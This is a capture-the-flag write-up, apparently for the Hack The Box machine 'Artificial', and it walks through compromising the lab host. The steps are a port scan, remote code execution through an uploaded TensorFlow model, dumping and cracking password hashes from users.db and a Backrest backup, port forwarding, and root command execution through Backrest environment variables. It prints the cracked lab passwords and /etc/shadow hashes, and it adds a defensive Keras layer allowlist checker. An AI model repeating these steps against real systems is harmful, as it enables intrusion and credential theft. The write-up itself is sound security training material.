Basic information

Port scan

22 and 80:

$ nmap -sC -sV -Pn 10.10.11.74
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-27 15:31 JST
Nmap scan report for 10.10.11.74
Host is up (0.20s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7c:e4:8d:84:c5:de:91:3a:5a:2b:9d:34:ed:d6:99:17 (RSA)
| 256 83:46:2d:cf:73:6d:28:6f:11:d5:1d:b4:88:20:d6:7c (ECDSA)
|_ 256 e3:18:2e:3b:40:61:b4:59:87:e8:4a:29:24:0f:6a:fc (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://artificial.htb/
3372/tcp filtered msdtc
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.16 seconds

80

A hosts entry is needed:

10.10.11.74 artificial.htb

AI-related:

tensorflow rce

Registration and login are open to anyone. The page says it will build the uploaded model, and the requirements file shows tensorflow-cpu==2.13.1:

rce

A search turns up the relevant vulnerability:

The runtime environment is a bit fiddly; Docker is the most convenient way to run it:

docker run -it --rm -v "$PWD":/app -w /app tensorflow/tensorflow:2.13.0 python3 exploit.py

After uploading the generated model and clicking "view predictions", we get a shell as app inside the container:
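As an added defensive example (not code from the box or its app), the following Python rejects an uploaded Keras model whose config contains layer types outside an allowlist. It assumes the JSON `model_config` has already been read from the .h5 file's root attribute, and that the model abuse relies on a layer class such as Lambda that embeds serialized Python code; the sample configs are constructed.

```python
import json

# Keras model_config walker, added as a defensive example (not the box's app code).
# Assumption: the upload handler extracts the JSON "model_config" attribute from
# the .h5 file before calling keras load_model, so models carrying serialized
# Python code can be rejected before deserialization ever runs.

MODEL_CLASSES = {"Sequential", "Functional", "Model"}  # containers that nest layers
SAFE_LAYER_CLASSES = {"InputLayer", "Dense", "Dropout", "Flatten", "Activation"}

def iter_layer_classes(model_dict):
    """Yield the class_name of every layer, descending into nested sub-models."""
    for layer in model_dict.get("config", {}).get("layers", []):
        name = layer.get("class_name", "")
        if name in MODEL_CLASSES:
            yield from iter_layer_classes(layer)
        else:
            yield name

def disallowed_layers(model_config_json):
    """Return the sorted list of layer classes not on the allowlist.
    An empty list means the model only uses plain, data-only layers."""
    model = json.loads(model_config_json)
    if model.get("class_name") not in MODEL_CLASSES:
        return [model.get("class_name", "<unknown>")]
    return sorted({c for c in iter_layer_classes(model) if c not in SAFE_LAYER_CLASSES})

# Constructed sample configs (not real uploaded models).
SAFE_MODEL_JSON = json.dumps({
    "class_name": "Sequential",
    "config": {"name": "seq", "layers": [
        {"class_name": "InputLayer", "config": {"batch_input_shape": [None, 4]}},
        {"class_name": "Dense", "config": {"units": 1, "activation": "sigmoid"}},
    ]},
})

# A Lambda layer's config carries "function": [<base64 marshalled code>, ...];
# the string here is a placeholder, not an actual payload.
SUSPICIOUS_MODEL_JSON = json.dumps({
    "class_name": "Functional",
    "config": {"name": "outer", "layers": [
        {"class_name": "InputLayer", "config": {"batch_input_shape": [None, 4]}},
        {"class_name": "Sequential", "config": {"name": "inner", "layers": [
            {"class_name": "Lambda", "config": {"function": ["PLACEHOLDER", None, None]}},
        ]}},
        {"class_name": "Dense", "config": {"units": 1}},
    ]},
})

if __name__ == "__main__":
    print("safe model:", disallowed_layers(SAFE_MODEL_JSON))              # []
    print("suspicious model:", disallowed_layers(SUSPICIOUS_MODEL_JSON))  # ['Lambda']
```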

users.db

There is a users.db in the instance directory; grab the hashes and crack them as usual:

app@artificial:~/app/instance$ sqlite3 users.db
sqlite> .tables
sqlite> select * from user;
1|gael|gael@artificial.htb|c99175974b6e192936d97224638a34f8
2|mark|mark@artificial.htb|0f3d8c76530022670f1c6029eed09ccb
3|robert|robert@artificial.htb|b606c5f5136170f15444251665638b36
4|royer|royer@artificial.htb|bc25b1f80f544c0ab451c02a3dca9fc6
5|mary|mary@artificial.htb|bf041041e57f1aff3be7ea1abd6129d0

gael's password can be cracked:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt -format=Raw-MD5 hash.txt

mattp005numbertwo

user flag

Log in to the host as gael:

gael to backrest_root

Inside the container, switch to the gael user and keep digging through files. In backups there is a backrest_backup.tar.gz, and our current sysadm group has read permission on it:

After extracting it, keep looking through the files; backrest_root's password hash is there, so crack it next:

gael@artificial:/tmp/miao$ tar -xvf backrest_backup.tar.gz

gael@artificial:/tmp/miao/backrest/.config/backrest$ cat config.json

"name": "backrest_root",
"passwordBcrypt": "JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP"

echo JDJhJDEwJGNWR0l5OVZNWFFkMGdNNWdpbkNtamVpMmtaUi9BQ01Na1Nzc3BiUnV0WVA1OEVCWnovMFFP | base64 -d > hash.txt

sudo john --wordlist=/usr/share/wordlists/rockyou.txt -format=bcrypt hash.txt

!@#$%^

backrest to root

Port 9898 is listening locally on the host. Forwarding it out shows it is Backrest; log in with the credentials obtained inside the container:

ssh gael@10.10.11.74 -L 9898:127.0.0.1:9898

The documentation shows that environment variables can be used to run system commands:

So it is simple: set an environment variable to execute an arbitrary command:

root flag

Submitting returns an error, which does not matter; the command has already been executed:

shadow

root:$6$UUrrHE6LTPdhmLil$v9nJaHljuUC0gR5HBAqVWvnDVgYoNYE6EvjIEGNykwadZ8w8gOu212j5bipzK72.nBtx/0h4z4CPki/Ac2f1i1:20015:0:99999:7:::
gael:$6$ZgkOwXDgoK.yOfv9$7gGQcVFbMepHAPCW.qS/1z87V5p15x4RokWKwNvFXqwo3QLEfFx2GaJs1JqbZ81i/uLy7bJ8TYk4dQYXQpeEC0:20015:0:99999:7:::
app:$6$1CKnP41b8QhfYnAx$b88.zZJfVQ84SBkePAyzIsXdA/w6wvUVq4c2ExOho0RIY8iS43bdJbBPHYdttqqNvBV.H6noc2EFkdBlbb5WL.:20015:0:99999:7:::

References